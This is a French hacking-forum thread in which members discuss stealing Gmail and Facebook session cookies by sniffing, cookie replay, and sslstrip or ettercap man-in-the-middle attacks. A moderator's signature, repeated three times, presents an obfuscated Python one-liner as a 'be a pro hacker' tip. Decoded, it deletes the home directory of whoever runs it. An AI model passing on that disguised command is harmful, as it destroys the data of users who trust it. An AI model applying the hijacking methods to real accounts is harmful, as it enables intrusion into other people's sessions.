Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 19-12-2012 12:37:32

iautran
Membre Radioactif
Inscription : 01-07-2010
Messages : 85

Gmail/Facebook encore faillible au vol de cookie ?

Salut à tous,

la question est assez simple. Depuis le passage au HTTPS de Google et Facebook, le vol de cookie est-il toujours possible en sniffant le réseau ?

D'après mes tests il semble que non.
Sur Google c'est possible sur une partie du site si on force l'utilisateur à aller sur des parties non sécurisées comme les news, etc... mais derrière si un attaquant injecte ce cookie dans son navigateur, il se verra bien loggué "en tant que" sur le site des news google mais s'il souhaite accéder aux mails de celui-ci ca ne marche pas (ré-authentification demandée).

Pour Facebook, je n'ai pas trouvé de moyen non plus sur mon lab pour injecter un cookie et entrer dans une session

Vous confirmez donc que désormais ce type d'attaque n'est plus réalisable ?

Merci

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 19-12-2012 13:46:17

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Gmail/Facebook encore faillible au vol de cookie ?

J'infirme.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 19-12-2012 14:15:22

iautran
Membre Radioactif
Inscription : 01-07-2010
Messages : 85

Re : Gmail/Facebook encore faillible au vol de cookie ?

Si tu pouvais être un tout petit peu plus explicite je suis preneur puisque tu sembles vouloir dire que pour toi le vol de cookie est toujours possible sur ces sites.

Merci

Hors Ligne

#4 19-12-2012 16:22:41

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Gmail/Facebook encore faillible au vol de cookie ?

Je te confirme que l'on peut toujours voler des cookies sur les sites Google et Facebook en sniffant le réseau.
big_smile

indice : hxxp://fr.wikipedia.org/wiki/Secure_Sockets_Layer





               (`.         ,-,
               `\ `.    ,;' /
                \`. \ ,'/ .'
          __     `.\ Y /.'
       .-'  ''--.._` ` (
     .'            /   `
    ,           ` '   Q '
    ,         ,   `._    \
    |         '     `-.;_'
    `  ;    `  ` --,.._;
    `    ,   )   .'
     `._ ,  '   /_
        ; ,''-,;' ``-
         ``-..__\``--` 







hop pour que tu te doutes que le message est long.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 19-12-2012 17:22:01

iautran
Membre Radioactif
Inscription : 01-07-2010
Messages : 85

Re : Gmail/Facebook encore faillible au vol de cookie ?

Merci pour ta réponse; alors j'avoue que je ne comprends pas car je l'avais déjà fait plusieurs fois par le passé mais là ca ne marche plus.

Voilà la méthode que j'utilise si tu peux me dire où je me gourre stp.

Depuis mon poste,je lance IE et je lance Wireshark
Je me connecte alors a GMAIL.
L'accès fonctionne; je surf un peu dans gmail, je vais sur un autre site, et je retourne dans GMAIL bref j'essaie de forcer l'envoi du cookie par le navigateur quoi :p

Ensuite j'arrête Wireshark et je fais une recherche sur le filter "http.cookie"

Je trouve (quand quelque chose est trouvé) un "truncated cookie" que je copie et que je colle dans une session Firefox cette fois.
J'actualise la page et là ... Rien (alors qu'avant c'était "Miracle" :p)

Si toi ou quelqu'un pouvait m'aiguiller; ca m'aiderait.
Je rencontre le meme souci avec Facebook alors que cet été encore tout fonctionnait de cette façon.

Merci

Hors Ligne

#6 19-12-2012 19:26:21

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Gmail/Facebook encore faillible au vol de cookie ?

Salut je confirme tout comme spawn wink



Je pense que tu cherches au mauvais endroit et comme beaucoup, tu verrais que Backtrack 5 possède des outils pour le SSL wink


M'enfin, je dis ca, mais je ne dis rien wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#7 20-12-2012 13:34:56

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Gmail/Facebook encore faillible au vol de cookie ?

Les cookies que tu cherches sont planqués dans du SSL.

Partant de là, pour les récupérer, tu as trois choix :
- tu vends du faux SSL au navigateur en te plaçant en MITM
- tu t'infiltres dans le tunnel en pwnant le navigateur
- tu pètes du SSL


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#8 21-12-2012 09:59:19

iautran
Membre Radioactif
Inscription : 01-07-2010
Messages : 85

Re : Gmail/Facebook encore faillible au vol de cookie ?

Merci pour votre réponse.
Ok on est d'accord pour le SSL bien sûr mais là on ajoute beaucoup de complexité à l'attaque puisqu'ils faux qu'on fasse du MITM avec une rupture de protocole  et en espérant que le client ne s'en rende pas compte etc...

Moi je parlais vraiment "d'avant", où, que ce soit avec gmail ou facebook, on pouvait intercepter le cookie car l'option Secure n'était pas positionné sur le cookie; alors que tout porte à croire que c'est le cas désormais avec ces deux sites.

Est-ce que vous confirmez ce que j'indique ici du coup svp ? smile

Thanks !

Hors Ligne

#9 27-12-2012 10:08:58

iautran
Membre Radioactif
Inscription : 01-07-2010
Messages : 85

Re : Gmail/Facebook encore faillible au vol de cookie ?

Personne pour prendre 3 minutes à m'expliquer ou me mettre sur une piste svp ?

Hors Ligne

#10 27-12-2012 10:32:22

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Gmail/Facebook encore faillible au vol de cookie ?

T'expliquer quoi ? Il me semble que tu as la réponse à ta question ("non, le sniff de cookies en clair ne fonctionne plus") et une piste de recherche ("MITM sur SSL") hmm

Pour les cookies en clair, j'en sais rien, ça fait longtemps que je n'ai pas testé sur ces deux sites. Mais c'est clair que si les cookies passent par le SSL, le seul moyen de les récupérer c'est de "casser" ledit SSL. Il y a une façon rapide de vérifier si les cookies sont chiffrés ou pas : tu fais une capture Wireshark du trafic, tu cherches les cookies et tu regardes s'ils sont en clair ou en SSL (je penche pour le second cas). Autre vérification facile, tu déploies Hamster & Ferret et tu regardes si tu arrives à choper des cookies pour les sites qui t'intéressent.

Pour le MITM sur SSL, une (très) rapide recherche sur le forum te donnerait directement deux pistes :
- ettercap et l'insertion de faux certificats (qui font généralement hurler n'importe quel navigateur moderne)
- sslstrip qui transforme silencieusement le trafic (local) HTTPS en HTTP, et qui établit lui-même la connexion HTTPS avec le site-cible.
M'est avis que c'est sslstrip qui te donnera les meilleurs résultats, à toi de faire tes essais.

Ca va, je suis bon sur les 3 minutes là ? wink

Hors Ligne

#11 27-12-2012 16:59:54

iautran
Membre Radioactif
Inscription : 01-07-2010
Messages : 85

Re : Gmail/Facebook encore faillible au vol de cookie ?

Ah lalala !!
Tu sais quoi (et le pire c'est que c'est vrai), c'est qu'en rechargeant la page, j'étais en train de me dire que si personne ne m'avait répondu je dirai "et c'est à ce moment qu'antares doit arriver normalement !!"

Mais bon tu m'as devancé ! :p

Alors maintenant sur le fond ...
Au sujet du vol de cookie, je n'ai justement pas eu de réponse des autres indiquant que le sniff de cookie ne fonctionnaient plus pour FB et Gmail. Bien qu'en HTTPS désormais l'important est de voir l'état du flag "Secure" de celui-ci.
Pour les cookies, je les vois bien passer via Gmail ou Facebook (car pour facebook, meme si HTTPS par défaut je sniff encore des paquets en http).

Bref j'ai bien mon cookie dans une requête http (on voit bien du "datr=...."); je l'importe dans FF, j'actualise ma page mais ca ne fonctionne pas.

Je voulais juste du coup savoir si quelque chose avait évolué par rapport à ce type d'attaque parce que pour le coup je ne capte pas.

Voili voilou

Merci encore antares pour ton partage.

Dernière modification par iautran (27-12-2012 17:00:21)

Hors Ligne

#12 28-12-2012 17:43:46

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : Gmail/Facebook encore faillible au vol de cookie ?

Il me semble que sur les 3/4 des navigateurs à jour, ainsi que pour certains sites (Gmail il me semble) le HTTPS est désormais obligatoire .... De fait, SSLStrip n'est plus d'une grande aide ... !


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#13 29-12-2012 00:05:28

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Gmail/Facebook encore faillible au vol de cookie ?

Il semble que ça dépende surtout du navigateur utilisé (et, dans une moindre mesure, du site web).

Je viens de tester à l'instant sous Windows, je ne suis arrivé à rien avec Firefox par contre ça fonctionne avec Internet Explorer 8 (fully patched)... Sslstrip intercepte toujours les mots de passe de Gmail, Hotmail et Facebook en tout cas, mais j'ai eu des erreurs avec d'autres sites moins connus. Parfois c'est lent mais ça finit par passer smile Même pour les sites où le HTTPS est "obligatoire" (genre Gmail), IE passe en HTTP sans broncher ni même avertir l'utilisateur...

Après, je ne sais pas dans quelle mesure ça "libère" les cookies du SSL... Je n'ai pas testé, mais je suppose qu'en mettant Wireshark en écoute sur le même port que SSLStrip, on ara accès au trafic en clair (avec tout ce que ça implique) wink

Hors Ligne

#14 31-12-2012 09:42:01

iautran
Membre Radioactif
Inscription : 01-07-2010
Messages : 85

Re : Gmail/Facebook encore faillible au vol de cookie ?

Alors dans mon cas je précise que je n'utilise pas SSLStrip (c'est un souhait).
Je simule uniquement une attaque "passive" en écoutant une session normale de Facebook/Gmail.

Je vois bien du flux HTTPS passer mais aussi des requêtes HTTP et là je vois clairement le cookie.
Sous Google, je peux ré-utiliser le cookie pour me connecter à des services google qui n'obligent pas à être en HTTPS (genre les "news" de mémoire) et je vois alors en haut à droite le nom de la personne dont j'ai volé le cookie. Si je tente alors de visualiser les mails, on me redemande le mot de passe. Bon, donc apparemment Gmail ne permet plus le vol de cookie classique (encore une fois je parle sans SSLStrip, juste de l'écoute passive).

Pour Facebook, j'ai également essayé et c'est un peu bizarre car bien que la session "écoutée" soit en HTTPs, quelques flux circulent en HTTP; je choppe bien le cookie mais quand je le rejoue ca marche pas et là pour le coup je n'arrive pas trop à comprendre.

Hors Ligne

#15 05-01-2013 16:09:38

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Gmail/Facebook encore faillible au vol de cookie ?

Il est possible (et même probable) que plusieurs cookies soient utilisés, et que seuls les données "non-critiques" passent en clair. Dit autrement, le cookie qui t'intéresse (celui qui authentifie l'utilisateur) est chiffré en SSL et il échappe à ta capture.

Je doute que tu t'en sortes avec une attaque purement passive, mais il y a une façon "simple" de vérifier : compare les données capturées normalement, et celles que tu récupères en te mettant en MITM avec ta cible. Si tu vois que tu as des cookies en plus avec le MITM, ça signifie que ces dernières passent normalement en SSL et que c'est foutu en attaque passive wink

Hors Ligne

#16 08-01-2013 02:42:30

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : Gmail/Facebook encore faillible au vol de cookie ?

Je suis tombé sur cette vidéo récemment, je pense que ça peut aider.


Sharkoff

Hors Ligne

#17 14-01-2013 11:00:42

iautran
Membre Radioactif
Inscription : 01-07-2010
Messages : 85

Re : Gmail/Facebook encore faillible au vol de cookie ?

Bonjour Squaks,

c'est justement exactement cette méthode que j'avais utilisé lors de mes tests il y a un an et demi environ et ca fonctionnait.

La même chose aujourd'hui ne marche plus; sauf à passer via SSLStrip.
J'essaierai de faire ce qu'antares m'a indiqué pour en avoir le coeur net mais ca a l'air en tout cas plutôt flagrant je voulais voir si d'autres avaient constatés comme moi que cela avait évolué mais je suis le seul à voler mes propres cookies je crois bien :p

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Encore une chaine Youtube par FredHilbert
6 664 14-07-2016 16:24:58 par coyotus
Creation E-mail Gmail.be par regard48  [ 1 2 ]
29 1068 13-07-2016 22:08:10 par kcdtv
9 1027 11-06-2016 15:39:41 par Furyo
Encore un Liveboxgenerator par Spzdb1  [ 1 2 ]
27 11538 16-03-2015 17:55:36 par romeoandjuliet
Épinglée :
103 60893 04-01-2015 21:11:56 par M1ck3y

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]